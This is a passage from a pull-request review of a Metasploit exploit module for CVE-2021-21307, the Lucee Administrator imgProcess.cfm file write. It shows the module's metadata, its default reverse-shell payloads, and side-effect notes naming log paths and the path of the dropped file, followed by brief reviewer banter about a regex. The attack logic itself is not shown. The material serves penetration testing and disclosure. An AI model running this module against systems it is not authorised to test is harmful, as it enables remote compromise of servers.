modules/exploits/linux/http/lucee_admin_imgprocess_file_write.rb

```diff
@@ -0,0 +1,196 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Lucee Administrator imgProcess.cfm Arbitrary File Write',
+        'Description' => %q{
+          This module exploits an arbitrary file write in Lucee Administrator's
+          imgProcess.cfm file to execute commands as the Tomcat user.
+        },
+        'Author' => [
+          'rootxharsh', # Discovery and PoC
+          'iamnoooob', # Discovery and PoC
+          'wvu' # Exploit
+        ],
+        'References' => [
+          ['CVE', '2021-21307'],
+          ['URL', 'https://dev.lucee.org/t/lucee-vulnerability-alert-november-2020-cve-2021-21307/7643'],
+          ['URL', 'https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r'],
+          ['URL', 'https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md']
+        ],
+        'DisclosureDate' => '2021-01-15', # rootxharsh and iamnoooob's writeup
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'], # TODO: Windows?
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false, # Tomcat user
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8888
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            # /opt/lucee/server/lucee-server/context/logs/application.log
+            # /opt/lucee/web/logs/exception.log
+            IOC_IN_LOGS,
+            # /opt/lucee/web/temp/admin-ext-thumbnails/__/
+            # /opt/lucee/web/temp/admin-ext-thumbnails/__/../../../context/[a-zA-Z0-9]{8,16}.cfm
```

Comment:
🥇

Reply:
Did I even get the regex right? Lmao.

Reply:
It was originally a glob, but that didn't offer enough precision...

Reply:
I like the extra detail; It's a shame the current data model doesn't offer extension points for additional metadata 😅

Reply:
https://github.com/rapid7/metasploit-framework/pull/10707#discussion_r220767224
#11785

RIP, lol.